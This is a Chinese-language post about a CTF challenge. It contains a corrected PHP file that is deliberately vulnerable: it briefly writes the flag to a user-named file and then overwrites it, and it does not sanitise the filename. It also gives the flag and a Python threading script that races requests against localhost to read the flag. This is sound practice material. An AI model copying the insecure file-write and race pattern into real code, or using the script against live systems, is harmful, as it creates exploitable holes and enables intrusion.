CTF题目的第二个文件好像有点小问题,$msg没有echo出来、mkdir()没有递归创建,稍微改动了下

<?php
header("Content-type:text/html;charset=utf-8");
$referer = $_SERVER['HTTP_REFERER'];
if(isset($referer)!== false) {
    $savepath = "uploads/" . sha1($_SERVER['REMOTE_ADDR']) . "/";
    if (!is_dir($savepath)) {
        $oldmask = umask(0);
        mkdir($savepath, 0777, true);
        umask($oldmask);
    }
    if ((@$_GET['filename']) && (@$_GET['content'])) {
        //$fp = fopen("$savepath".$_GET['filename'], 'w');
        $content = 'HRCTF{y0u_n4ed_f4st}   by:l1nk3r';
        file_put_contents("$savepath" . $_GET['filename'], $content);
        $msg = 'Flag is here,come on~ ' . $savepath . htmlspecialchars($_GET['filename']) . "";
        echo $msg;
        usleep(100000);
        $content = "Too slow!";
        file_put_contents("$savepath" . $_GET['filename'], $content);
    }
   print <<<EOT
<form action="" method="get">
<div class="form-group">
<label for="exampleInputEmail1">Filename</label>
<input type="text" class="form-control" name="filename" id="exampleInputEmail1" placeholder="Filename">
</div>
<div class="form-group">
<label for="exampleInputPassword1">Content</label>
<input type="text" class="form-control" name="content" id="exampleInputPassword1" placeholder="Contont">
</div>
<button type="submit" class="btn btn-default">Submit</button>
</form>
EOT;
}
else{
    echo 'you can not see this page';
}
?>

再附一个自己写的垃圾脚本

import threading
import requests

uplurl = 'http://localhost/ctf/uploadsomething.php?filename=flag&content=1'
resurl = 'http://localhost/ctf/uploads/363baea9cba210afac6d7a556fca596e30c46333/flag'

class Access(threading.Thread):
    def __init__(self, number, url):
        threading.Thread.__init__(self)
        self.number = number
        self.url = url
    def run(self):
        if 'uploadsomething' in self.url:
            for i in range(self.number):
                requests.get(self.url, headers={'Referer':'Anything'})
        else:
            for i in range(self.number):
                result = str(requests.get(self.url).content).replace('b', '')+'\n'
                print(result)

up = Access(3, uplurl)
re = Access(3, resurl)

up.start()
re.start()

up.join()
re.join()